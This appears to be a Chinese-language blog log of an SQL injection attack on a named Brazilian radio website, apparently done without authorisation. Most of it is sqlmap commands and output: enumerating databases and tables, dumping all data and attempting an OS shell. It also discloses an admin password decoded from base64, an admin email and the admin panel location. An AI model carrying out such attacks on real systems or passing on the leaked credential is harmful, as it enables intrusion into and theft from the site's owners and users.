03-08-sql-inject

scan

1
2
3
4
80/tcp   open  http          cloudflare
443/tcp  open  ssl/https     cloudflare
8080/tcp open  http-proxy    cloudflare
8443/tcp open  ssl/https-alt cloudflare

确认为一个web server,有云防护,不允许直接ip访问

ping,返回值为ttl=128;网站url,大小写不敏感。

说明是windows os

sql inject

www.radiomiriam.com.br 104.28.2.130

http://www.radiomiriam.com.br/noticia.php?id=615%27

You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ‘’615’’’ at line 1

  1. 加单引号直接报错,两个单引号没有报错,确认了sql注入。

  2. sqlmap -u “http://www.radiomiriam.com.br/noticia.php?id=615" –dbs
    提示无注入漏洞,em…
    以为是数据库的原因,sqlmap是不是不支持MariaDB

  3. 网上搜索,sqlmap是支持MariaDB的。
    用burp抓包,访问http://www.radiomiriam.com.br/noticia.php?id=615的数据包。

sqlmap -r request.txt --threads 10 --level 5 --risk 3 --random-agent --batch -v 3

4.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
sqlmap -r request.txt --threads 10 --level 5 --risk 3 --random-agent --batch -v 3 --dbms mysql --dbs

[*] information_schema
[*] radiomir_radio

sqlmap -r request.txt --threads 10 --level 5 --risk 3 --random-agent --batch -v 3 --dbms mysql --current-db
current database:    'radiomir_radio'

sqlmap -r request.txt --threads 10 --level 5 --risk 3 --random-agent --batch -v 3 --dbms mysql -D information_schema --tables
[75 tables]

sqlmap -r request.txt --threads 10 --level 5 --risk 3 --random-agent --batch -v 3 --dbms mysql -D radiomir_radio --tables
[17 tables]

sqlmap -r id.req --threads 10 --level 5 --risk 3 --random-agent --batch --is-dba -v 3
不是最高权限用户

5.

1
2
3
4
5
6
7
8
9
10
11
12
sqlmap -r request.txt --threads 10 --level 5 --risk 3 --random-agent --batch -v 3 --dbms mysql -D radiomir_radio -T admin --column
Table: admin

[5 columns]
。。。

---
将所有数据导出
sqlmap -r id.req --threads 10 --level 5 --risk 3 --random-agent --batch --dump -v 3

/root/.sqlmap/output/www.radiomiriam.com.br/dump/radiomir_radio/noticias_imagens.csv
/root/.sqlmap/output/www.radiomiriam.com.br

6.
尝试写webshell,无写权限。

1
2
sqlmap -r request.txt --threads 10 --level 5 --risk 3 --random-agent --batch -v 3 --dbms mysql --os-shell
[WARNING] it looks like the file has not been written (usually occurs if the DBMS process user has no write privileges in the destination path)

7.
sqlmap -r request.txt –threads 10 –level 5 –risk 3 –random-agent –batch -v 3 –dbms mysql -D radiomir_radio -T admin -C senha –dump
aWZvNjQ3Nw==
解码后ifo6477

  1. 找后台

邮箱:webmaster@radiomiriam.com.br

访问这个网站www.radiomiriam.com.br,直接重定向到http://miriamcaravaggio.com.br/

后台地址:www.radiomiriam.com.br/cpanel

后台是通过代理连接的,没有凭据,所以无法连接。以后有经验了再看看cpanel吧…